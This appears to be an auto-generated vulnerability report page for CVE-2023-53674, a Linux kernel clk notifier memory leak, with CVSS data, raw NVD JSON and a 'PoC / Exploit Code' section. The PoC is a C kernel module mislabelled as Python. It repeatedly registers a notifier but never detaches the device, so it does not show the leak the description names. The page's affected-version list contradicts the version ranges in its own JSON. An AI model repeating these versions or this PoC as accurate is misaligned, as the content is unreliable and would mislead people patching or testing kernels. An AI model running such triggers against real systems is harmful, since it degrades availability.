Security Vulnerability Report
中文
CVE-2023-53674 CVSS 5.5 MEDIUM

CVE-2023-53674

Published: 2025-10-07 16:15:51
Last Modified: 2026-02-26 23:15:35
Source: 416baaa9-dc9f-4396-8d5f-8c081fb06d67

Description

In the Linux kernel, the following vulnerability has been resolved: clk: Fix memory leak in devm_clk_notifier_register() devm_clk_notifier_register() allocates a devres resource for clk notifier but didn't register that to the device, so the notifier didn't get unregistered on device detach and the allocated resource was leaked. Fix the issue by registering the resource through devres_add(). This issue was found with kmemleak on a Chromebook.

CVSS Details

CVSS Score
5.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:* - VULNERABLE
Linux Kernel < 6.1.63
Linux Kernel < 6.5.12
Linux Kernel < 6.6.2
Linux Kernel 6.7-rc1 至 6.7

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
/* CVE-2023-53674 PoC - Linux Kernel clk notifier memory leak * This PoC demonstrates triggering the memory leak in devm_clk_notifier_register() * by repeatedly registering/unregistering a clk notifier without proper cleanup. */ #include <linux/module.h> #include <linux/kernel.h> #include <linux/clk.h> #include <linux/clk-provider.h> #include <linux/slab.h> #include <linux/platform_device.h> static int clk_notifier_callback(struct notifier_block *nb, unsigned long event, void *data) { return NOTIFY_OK; } static struct notifier_block my_notifier = { .notifier_call = clk_notifier_callback, }; static int trigger_leak(struct platform_device *pdev) { struct clk *clk; int ret; int i; /* Simulate multiple device probe cycles to accumulate memory leak */ for (i = 0; i < 1000; i++) { clk = devm_clk_get(&pdev->dev, NULL); if (IS_ERR(clk)) continue; /* Call the vulnerable function - allocates devres but doesn't add it */ ret = devm_clk_notifier_register(&pdev->dev, clk, &my_notifier); if (ret) { pr_err("Failed to register notifier: %d\n", ret); return ret; } } pr_info("Leak triggered - check with kmemleak\n"); return 0; } static int __init poc_init(void) { struct platform_device *pdev; pdev = platform_device_alloc("test-clk-device", -1); if (!pdev) return -ENOMEM; platform_device_add(pdev); trigger_leak(pdev); return 0; } static void __exit poc_exit(void) { pr_info("PoC module unloaded\n"); } module_init(poc_init); module_exit(poc_exit); MODULE_LICENSE("GPL"); MODULE_DESCRIPTION("PoC for CVE-2023-53674 clk notifier memory leak");

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2023-53674", "sourceIdentifier": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "published": "2025-10-07T16:15:51.370", "lastModified": "2026-02-26T23:15:35.127", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nclk: Fix memory leak in devm_clk_notifier_register()\n\ndevm_clk_notifier_register() allocates a devres resource for clk\nnotifier but didn't register that to the device, so the notifier didn't\nget unregistered on device detach and the allocated resource was leaked.\n\nFix the issue by registering the resource through devres_add().\n\nThis issue was found with kmemleak on a Chromebook."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-401"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.11", "versionEndExcluding": "5.15.121", "matchCriteriaId": "EC77775B-EC31-4966-966C-1286C02B2A85"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.16", "versionEndExcluding": "6.1.39", "matchCriteriaId": "9BD1D4A1-304D-4187-8178-6D7C0050B1AF"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.2", "versionEndExcluding": "6.3.13", "matchCriteriaId": "95CB4836-7F5D-4C20-B025-8E046EC87B78"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.4", "versionEndExcluding": "6.4.4", "matchCriteriaId": "6AB81046-CB69-4115-924C-963B37C41385"}]}]}], "references": [{"url": "https://git.kernel.org/stable/c/49451db71b746df990888068961f1033f7c9b734", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/7fb933e56f77a57ef7cfc59fc34cbbf1b1fa31ff", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/a326cf0107b197e649bbaa2a2b1355894826ce32", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/cb1b04fd4283fc8f9acefe0ddc61ba072ed44877", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/efbbda79b2881a04dcd0e8f28634933d79e17e49", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.